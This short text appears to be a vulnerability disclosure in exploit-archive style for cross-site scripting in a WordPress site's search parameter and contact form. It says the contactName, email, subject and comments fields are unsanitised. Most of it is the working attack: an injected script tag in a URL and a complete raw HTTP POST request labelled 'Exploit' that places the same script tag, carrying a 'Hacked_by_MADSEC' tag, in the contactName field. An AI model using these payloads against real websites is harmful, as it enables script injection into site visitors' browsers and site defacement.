http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>

The "ContactName" ,"email" ,"subject" ,"comments", variables are not
properly sanitized before being used

Exploit:

POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/

contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=